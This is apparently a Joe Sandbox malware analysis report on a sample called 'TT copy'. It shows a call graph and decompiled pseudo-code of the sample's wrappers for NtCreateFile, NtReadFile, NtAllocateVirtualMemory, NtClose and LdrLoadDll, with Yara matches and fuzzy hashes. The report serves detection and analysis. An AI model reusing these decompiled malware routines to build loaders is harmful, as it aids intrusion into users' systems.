34652 40b07b 34650->34652 34651->34613 34653 41a450 2 API calls 34652->34653 34654 40b085 34653->34654 34654->34613 34656 407966 34655->34656 34687 419840 34656->34687 34658 40797f 34663 407af1 34658->34663 34708 407520 34658->34708 34660 407a65 34661 407720 11 API calls 34660->34661 34660->34663 34662 407a93 34661->34662 34662->34663 34664 419ec0 2 API calls 34662->34664 34663->34563 34665 407ac8 34664->34665 34665->34663 34666 41a4c0 2 API calls 34665->34666 34666->34663 34667->34609 34668->34616 34669->34622 34670->34624 34672 407749 34671->34672 34748 407690 34672->34748 34675 41a4c0 2 API calls 34676 40775c 34675->34676 34676->34675 34677 4077e7 34676->34677 34679 4077e2 34676->34679 34756 40d9e0 34676->34756 34677->34630 34678 41a450 2 API calls 34680 40781a 34678->34680 34679->34678 34680->34677 34681 419cd0 LdrLoadDll 34680->34681 34682 40787f 34681->34682 34682->34677 34760 419d10 34682->34760 34684 4078e3 34684->34677 34685 4156b0 8 API calls 34684->34685 34686 407938 34685->34686 34686->34630 34688 41c0c0 2 API calls 34687->34688 34689 419857 34688->34689 34715 408770 34689->34715 34691 419872 34692 4198b0 34691->34692 34693 419899 34691->34693 34696 41be70 2 API calls 34692->34696 34694 41bef0 2 API calls 34693->34694 34695 4198a6 34694->34695 34695->34658 34697 4198ea 34696->34697 34698 41be70 2 API calls 34697->34698 34699 419903 34698->34699 34705 419ba4 34699->34705 34721 41beb0 34699->34721 34702 419b90 34703 41bef0 2 API calls 34702->34703 34704 419b9a 34703->34704 34704->34658 34706 41bef0 2 API calls 34705->34706 34707 419bf9 34706->34707 34707->34658 34709 40761f 34708->34709 34710 407535 34708->34710 34709->34660 34710->34709 34711 4156b0 8 API calls 34710->34711 34712 4075a2 34711->34712 34713 41bef0 2 API calls 34712->34713 34714 4075c9 34712->34714 34713->34714 34714->34660 34716 408795 34715->34716 34717 40a150 LdrLoadDll 34716->34717 34718 4087c8 34717->34718 34720 4087ed 34718->34720 34724 40b950 34718->34724 34720->34691 34742 41a540 34721->34742 34725 40b97c 34724->34725 34726 41a1a0 LdrLoadDll 34725->34726 34727 40b995 34726->34727 34728 40b99c 34727->34728 34735 41a1e0 34727->34735 34728->34720 34732 40b9d7 34733 41a450 2 API calls 34732->34733 34734 40b9fa 34733->34734 34734->34720 34736 41af70 LdrLoadDll 34735->34736 34737 41a1fc 34736->34737 34741 10a9710 LdrInitializeThunk 34737->34741 34738 40b9bf 34738->34728 34740 41a7d0 LdrLoadDll 34738->34740 34740->34732 34741->34738 34743 41af70 LdrLoadDll 34742->34743 34744 41a55c 34743->34744 34747 10a9a00 LdrInitializeThunk 34744->34747 34745 419b89 34745->34702 34745->34705 34747->34745 34749 4076a8 34748->34749 34750 40a150 LdrLoadDll 34749->34750 34751 4076c3 34750->34751 34752 415ab0 LdrLoadDll 34751->34752 34753 4076d3 34752->34753 34754 4076dc PostThreadMessageW 34753->34754 34755 4076f0 34753->34755 34754->34755 34755->34676 34757 40d9f3 34756->34757 34763 419e50 34757->34763 34761 41af70 LdrLoadDll 34760->34761 34762 419d2c 34761->34762 34762->34684 34764 41af70 LdrLoadDll 34763->34764 34765 419e6c 34764->34765 34768 10a9840 LdrInitializeThunk 34765->34768 34766 40da1e 34766->34676 34768->34766 34769->34572 34771 419f9c 34770->34771 34772 41af70 LdrLoadDll 34770->34772 34775 10a99a0 LdrInitializeThunk 34771->34775 34772->34771 34773 40d86e 34773->34578 34773->34579 34775->34773 34776->34584 34777->34589 34778->34594 34779 10a9540 LdrInitializeThunk

                                                                                                            Executed Functions

                                                                                                            Function 0041A2DA Relevance: 1.6, APIs: 1, Instructions: 80filenativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 195 41a2da-41a2dc 196 41a339-41a371 NtCreateFile 195->196 197 41a2de 195->197 198 41a2e0-41a319 call 41af70 197->198 199 41a263-41a291 call 41af70 197->199
                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00409123,?,00415817,00409123,FFFFFFFF,?,?,FFFFFFFF,00409123,00415817,?,00409123,00000060,00000000,00000000), ref: 0041A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: c4953afbfdafab6b5c24d1117d1b993a8af82f5411d7effb742233a813137e66
                                                                                                            • Instruction ID: 755ad30551fbf6b80ad92c97070095b7ef6022829d1afaaf586b5d4fb2fd8bc7
                                                                                                            • Opcode Fuzzy Hash: c4953afbfdafab6b5c24d1117d1b993a8af82f5411d7effb742233a813137e66
                                                                                                            • Instruction Fuzzy Hash: FE2139B6204108AFDB14DF88DC85EEB37ADEF8C354F118549FA0C9B242C630F8518BA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040A150 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 221 40a150-40a16c 222 40a174-40a179 221->222 223 40a16f call 41cdc0 221->223 224 40a17b-40a17e 222->224 225 40a17f-40a18d call 41d1e0 222->225 223->222 228 40a19d-40a1ae call 41b510 225->228 229 40a18f-40a19a call 41d460 225->229 234 40a1b0-40a1c4 LdrLoadDll 228->234 235 40a1c7-40a1ca 228->235 229->228 234->235
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040A150(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CDC0(_a8,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D1E0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D460( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B510(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                            0x0040a16c
                                                                                                            0x0040a16f
                                                                                                            0x0040a174
                                                                                                            0x0040a179
                                                                                                            0x0040a183
                                                                                                            0x0040a188
                                                                                                            0x0040a18b
                                                                                                            0x0040a18d
                                                                                                            0x0040a195
                                                                                                            0x0040a19a
                                                                                                            0x0040a19a
                                                                                                            0x0040a1a1
                                                                                                            0x0040a1a9
                                                                                                            0x0040a1ac
                                                                                                            0x0040a1ae
                                                                                                            0x0040a1c2
                                                                                                            0x00000000
                                                                                                            0x0040a1c4
                                                                                                            0x0040a1ca
                                                                                                            0x0040a17e
                                                                                                            0x0040a17e
                                                                                                            0x0040a17e

                                                                                                            APIs
                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Load
                                                                                                            • String ID:
                                                                                                            • API String ID: 2234796835-0
                                                                                                            • Opcode ID: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                                                                                            • Instruction ID: 28ce5d3be8b252fe6ada86924bfdd1bfe597e1d717b1112511943715be3c05a4
                                                                                                            • Opcode Fuzzy Hash: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                                                                                            • Instruction Fuzzy Hash: F1015EB5E0020DBBDB10DBA1DC42FDEB7789B14308F0041AAE908AB281F634EB54CB95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 236 41a320-41a371 call 41af70 NtCreateFile
                                                                                                            C-Code - Quality: 35%
                                                                                                            			E0041A320(void* __ebx, signed int __ecx, intOrPtr* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v3;
				intOrPtr _t16;
				long _t22;

				_t16 = _a4;
				 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
				 *__edx =  *__edx - __ecx;
				_push(__ecx);
				_t4 = _t16 + 0xc5c; // 0xc5c
				_push(_t16);
				E0041AF70(__ecx);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                                                                                                            0x0041a323
                                                                                                            0x0041a325
                                                                                                            0x0041a32b
                                                                                                            0x0041a32e
                                                                                                            0x0041a32f
                                                                                                            0x0041a336
                                                                                                            0x0041a337
                                                                                                            0x0041a36d
                                                                                                            0x0041a371

                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00409123,?,00415817,00409123,FFFFFFFF,?,?,FFFFFFFF,00409123,00415817,?,00409123,00000060,00000000,00000000), ref: 0041A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                                                                            • Instruction ID: a2aaebe10041835da89b7de23d426bb534e4eab43eabe5d401869e8ba4a1940d
                                                                                                            • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                                                                                            • Instruction Fuzzy Hash: FEF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118248BA0997251D630F8518BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A324 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 239 41a324-41a336 240 41a33c-41a371 NtCreateFile 239->240 241 41a337 call 41af70 239->241 241->240
                                                                                                            C-Code - Quality: 38%
                                                                                                            			E0041A324(void* __eax, void* __ebx, signed int __ecx, intOrPtr* __edx) {
				long _t21;
				void* _t35;

				_t15 = __eax;
				_t36 = _t35 + 1;
				 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
				 *__edx =  *__edx - __ecx;
				_push(__ecx);
				_t3 = _t15 + 0xc5c; // 0xc5c
				_push(__eax);
				E0041AF70(__ecx);
				_t21 = NtCreateFile( *(_t35 + 0xd),  *(_t35 + 0x11),  *(_t36 + 0x14),  *(_t36 + 0x18),  *(_t36 + 0x1c),  *(_t36 + 0x20),  *(_t36 + 0x24),  *(_t36 + 0x28),  *(_t36 + 0x2c),  *(_t36 + 0x30),  *(_t36 + 0x34)); // executed
				return _t21;
			}





                                                                                                            0x0041a324
                                                                                                            0x0041a324
                                                                                                            0x0041a325
                                                                                                            0x0041a32b
                                                                                                            0x0041a32e
                                                                                                            0x0041a32f
                                                                                                            0x0041a336
                                                                                                            0x0041a337
                                                                                                            0x0041a36d
                                                                                                            0x0041a371

                                                                                                            APIs
                                                                                                            • NtCreateFile.NTDLL(00000060,00409123,?,00415817,00409123,FFFFFFFF,?,?,FFFFFFFF,00409123,00415817,?,00409123,00000060,00000000,00000000), ref: 0041A36D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 99a1d5391ea82f851d1abd71c55384e86c8545d0e2b67006a244c5a1e4af7ed2
                                                                                                            • Instruction ID: 955a3615a58bc84b70413108b0a317e7b122ba80def8ab38860059ab301b7d99
                                                                                                            • Opcode Fuzzy Hash: 99a1d5391ea82f851d1abd71c55384e86c8545d0e2b67006a244c5a1e4af7ed2
                                                                                                            • Instruction Fuzzy Hash: F6F0F4B2204149AFCB08CF98DC84CEB77ADEF8C354B05824CFA1C93201D630E851CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A3D0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 242 41a3d0-41a419 call 41af70 NtReadFile
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E0041A3D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc64;
				E0041AF70( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                                            0x0041a3d3
                                                                                                            0x0041a3df
                                                                                                            0x0041a3e7
                                                                                                            0x0041a415
                                                                                                            0x0041a419

                                                                                                            APIs
                                                                                                            • NtReadFile.NTDLL(004159D2,5D9515B3,FFFFFFFF,00415691,?,?,004159D2,?,00415691,FFFFFFFF,5D9515B3,004159D2,?,00000000), ref: 0041A415
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                                                                            • Instruction ID: 779a587cf63d30236cb0bbdb99b63125838c179a486f17d262a5a2bfd3bb36b4
                                                                                                            • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                                                                                            • Instruction Fuzzy Hash: 15F0A4B6200208ABCB14DF99DC85EEB77ADAF8C754F118249BA0D97251D630E811CBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 245 41a500-41a53d call 41af70 NtAllocateVirtualMemory
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A500(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc7c; // 0x3c7c
				E0041AF70( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                                            0x0041a50f
                                                                                                            0x0041a517
                                                                                                            0x0041a539
                                                                                                            0x0041a53d

                                                                                                            APIs
                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B1AD,?,0041B1AD,?,00000000,?,00003000,00000040,00409123,00000000), ref: 0041A539
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2167126740-0
                                                                                                            • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                                                                                            • Instruction ID: 44bf95e658cca290f27d383d2d8ad6e73610bd7c98e0f9e069b1e3542d92265d
                                                                                                            • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                                                                                            • Instruction Fuzzy Hash: 6CF015B6210208ABDB14DF89DC81EEB77ADAF8C754F018109BE0897241C630F811CBB4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A44A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 41a44a-41a479 call 41af70 NtClose
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E0041A44A(void* __eax, signed int __ebx, void* __edx, void* _a4) {
				intOrPtr _v0;
				long _t13;

				_push(__eax);
				 *(__eax - 0x1374aaa3) =  *(__eax - 0x1374aaa3) ^ __ebx;
				_t10 = _v0;
				_t5 = _t10 + 0x14; // 0x56c29f0f
				_t6 = _t10 + 0xc6c; // 0x409d8f
				E0041AF70( *_t5, _v0, _t6,  *_t5, 0, 0x2c);
				_t13 = NtClose(_a4); // executed
				return _t13;
			}





                                                                                                            0x0041a44a
                                                                                                            0x0041a44d
                                                                                                            0x0041a453
                                                                                                            0x0041a456
                                                                                                            0x0041a45f
                                                                                                            0x0041a467
                                                                                                            0x0041a475
                                                                                                            0x0041a479

                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(004159B0,?,?,004159B0,00409123,FFFFFFFF), ref: 0041A475
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            • Opcode ID: b9fe81b38f2666e1472be37a7e237af01b4014b94ea8109df3a527428193ef01
                                                                                                            • Instruction ID: 748072cf6088b46230114b144afaf36d3dd208f9fd8cb59c5c1f715598b80cfd
                                                                                                            • Opcode Fuzzy Hash: b9fe81b38f2666e1472be37a7e237af01b4014b94ea8109df3a527428193ef01
                                                                                                            • Instruction Fuzzy Hash: 68E0C276200110AFD710EFA4CCC8ED77B69DF44260F008099B9489F243C530E500C7E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 264 41a450-41a466 265 41a46c-41a479 NtClose 264->265 266 41a467 call 41af70 264->266 266->265
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A450(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc6c; // 0x409d8f
				E0041AF70( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                            0x0041a453
                                                                                                            0x0041a456
                                                                                                            0x0041a45f
                                                                                                            0x0041a467
                                                                                                            0x0041a475
                                                                                                            0x0041a479

                                                                                                            APIs
                                                                                                            • NtClose.NTDLL(004159B0,?,?,004159B0,00409123,FFFFFFFF), ref: 0041A475
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close
                                                                                                            • String ID:
                                                                                                            • API String ID: 3535843008-0
                                                                                                            • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                                                                                            • Instruction ID: 89d28a435c4e5e12339fbd4884c2b6668c99de876a0decdf7d51bdf93669a9a3
                                                                                                            • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                                                                                            • Instruction Fuzzy Hash: 9ED01776200214ABD620EB99DC89ED77BACDF48664F018055BA485B242C530FA1086E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 9408ec3e205d1997a99e7ba423876aaaab5d350510a15b7c2ef598f872d8b591
                                                                                                            • Instruction ID: a9307e860d24476236ff214139100ecaa5e2701b36316f2f57c08317b013bada
                                                                                                            • Opcode Fuzzy Hash: 9408ec3e205d1997a99e7ba423876aaaab5d350510a15b7c2ef598f872d8b591
                                                                                                            • Instruction Fuzzy Hash: 389002B120100903D180719984447864105E7D0345F51C021A5454554EC6999DD577A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 8641402d27c83f6a320770430df0466b45dcbca7696e14fd9c3a28a873e0eba8
                                                                                                            • Instruction ID: a43d5476b144e1c2dc84f4567f8515f753a87f25546cb5a6805b0c228c7ea902
                                                                                                            • Opcode Fuzzy Hash: 8641402d27c83f6a320770430df0466b45dcbca7696e14fd9c3a28a873e0eba8
                                                                                                            • Instruction Fuzzy Hash: 099002A134100943D14061998454B464105E7E1345F51C025E1454554DC659DC527266
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: e3c6ffc9e5487d231db3c438002c7204133edeaed864a475d1c6892ff6eb088d
                                                                                                            • Instruction ID: eff90c1336ecd728c24c7468cb7942aad22ecb11423d78b623f407a54b62f1e3
                                                                                                            • Opcode Fuzzy Hash: e3c6ffc9e5487d231db3c438002c7204133edeaed864a475d1c6892ff6eb088d
                                                                                                            • Instruction Fuzzy Hash: 37900261242046535585B19984445478106F7E0285791C022A1804950CC566A856E761
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 5a69f5f6dc11fdeead0661001a3df527164208c678a10b9884c6c483ced7156a
                                                                                                            • Instruction ID: 1470cc92514e7e93202a88ab5a6d1881b470c324c28324407aa994297baeadef
                                                                                                            • Opcode Fuzzy Hash: 5a69f5f6dc11fdeead0661001a3df527164208c678a10b9884c6c483ced7156a
                                                                                                            • Instruction Fuzzy Hash: 7890027120100913D151619985447474109E7D0285F91C422A0814558DD6969952B261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 2149022afa40200aba1d3d5789069b6e46f1b6d5e15991f1d3701de607533fbb
                                                                                                            • Instruction ID: 70296e7b22bd80559d7966d78a8e3ed84912c6c8393e10e1d4ee3baaa6fa629b
                                                                                                            • Opcode Fuzzy Hash: 2149022afa40200aba1d3d5789069b6e46f1b6d5e15991f1d3701de607533fbb
                                                                                                            • Instruction Fuzzy Hash: 9C90026160100A03D14171998444656410AE7D0285F91C032A1414555ECA659992B271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 24a77a07821596d783b2343b3060b69d3c0550d61f3b51ee137bbbc39d58bf7c
                                                                                                            • Instruction ID: a8449988bb409aeecf2a727f51b660c96ab2d7d5c71db61c0f82039aa133121c
                                                                                                            • Opcode Fuzzy Hash: 24a77a07821596d783b2343b3060b69d3c0550d61f3b51ee137bbbc39d58bf7c
                                                                                                            • Instruction Fuzzy Hash: EB90027120140903D1406199885474B4105E7D0346F51C021A1554555DC665985176B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
